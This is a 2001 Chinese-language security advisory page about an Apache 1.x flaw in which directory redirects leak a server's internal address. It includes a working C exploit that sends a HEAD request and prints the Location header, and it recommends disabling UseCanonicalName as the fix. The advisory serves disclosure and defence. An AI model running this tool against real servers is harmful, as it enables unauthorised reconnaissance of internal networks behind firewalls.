xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Apache Server地址存在泄露问题


发布时间:2001-08-15
更新时间:2001-08-15
严重程度:
威胁程度:服务器信息泄露
错误类型:设计错误
利用方式:服务器模式

受影响系统
Apache Group Apache 1.3
   - Microsoft Windows NT 4.0
   - Microsoft Windows 2000
Apache Group Apache 1.2
Apache Group Apache 1.0
详细描述
Apache WEB服务器存在一个落动可以导致服务器地址的泄露。当带有URI目录
的HTTP请求发送给服务器的时候,问题就会产生,如果URI不包含'/'字符,
服务器为了完成请求就会返回3xx重定向错误代码来指示进一步的行为,而
'Location'响应头中会包含服务器的地址来作为响应的一部分。这样服务器
如果在防火墙背后就可能导致泄露服务器的内部网络地址。

测试代码
/* Exploit for the Apache Server Address Disclosure Vulnerability
**
** by: magnum
**     magnum@fuckthat.org
**     http://fuckthat.org
**
** [explanation taken from from http://securityfocus.com/vdb/?id=3169]
**
** A vulnerability has been discovered in Apache web server that may
** result in the disclosure of the server's address.
**
** The problem occurs when a HTTP request containing the URI of a directory
** is submitted to the server. If the URI does not contain a trailing '/'
** character, the server returns a 3xx redirection error code indicating that
** further action must be taken in order to fulfill the request. When this
** occurs, a 'Location' response-header containing the address of the server
** is returned as part of the response.
**
** In a situation where the request is redirected to the server behind a
** firewall, this could lead to the disclosure of the server's internal
** network address.
**
** --SNIP--
**
** As it was put so well in that explanation, an attacker could exploit this
** vulnerability to gain important information that could help you or an
** attacker to eventually compromise a network or server that resides behind
** an ipchains/NAT firewall, routing firewall, or many other different kinds
** of bastion hosts.
**
** Enjoy :)
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/time.h>
#define ERROR -1
#define MAXLEN 400
main(int argc, char *argv[])
{
int sock_fd;
struct sockaddr_in dest_addr;
struct hostent *he;
char buf[1024];
char request[1024];
char *p;
int i;
int jackmove;

if (argc != 4) {
printf("Usage: %s <hostname> <port> <directory>\n",argv[0]);
printf("Example(verbose): %s www.linux.org 80 /info\n",argv[0]);
printf("Example(specify): %s www.linux.org 80 /info | grep Location\n",argv[0]);
printf("Example(output) : Location: http://127.0.0.3/supersecretshit/\n");
exit(1);
}

if ((he=gethostbyname(argv[1])) == NULL) { /* get the host info */
printf("Unknown host.\n");
exit(1);
}

dest_addr.sin_family = AF_INET;
i = atoi(argv[2]);
dest_addr.sin_port = htons(i);
dest_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_addr.sin_zero), 8);

/* heh, sorry, no error checking */
if((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Cannot open socket.\n");
exit(1);
}

if(connect(sock_fd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr)) == -1) {
printf("Could not connect to socket.\n");
exit(1);
}

printf("Disclose - Exploit for the Apache Server Address Disclosure Vulnerability\n");
printf("by: magnum - magnum@fuckthat.org - http://www.fuckthat.org\n\n");
strcat(request,"HEAD ");
strcat(request,argv[3]);
strcat(request," HTTP/1.0\n\n\n");
sleep(1);
send(sock_fd, request, strlen(request), 0);
printf("Status: ");
if((jackmove=recv(sock_fd, buf, MAXLEN, 0)) == ERROR) {
    printf("recv error\n");
        close(sock_fd);
    exit(1);
}

printf("Done.\n");
buf[jackmove] = '\0';
p=strstr(buf, "Location");
printf("%s\n", p);

close(sock_fd);
exit(0);
}

解决方案
关闭'UseCanonicalName' 特征和通过ServerName来指定适当的服务器名字。

相关信息
magnum@fuckthat.org
http://fuckthat.org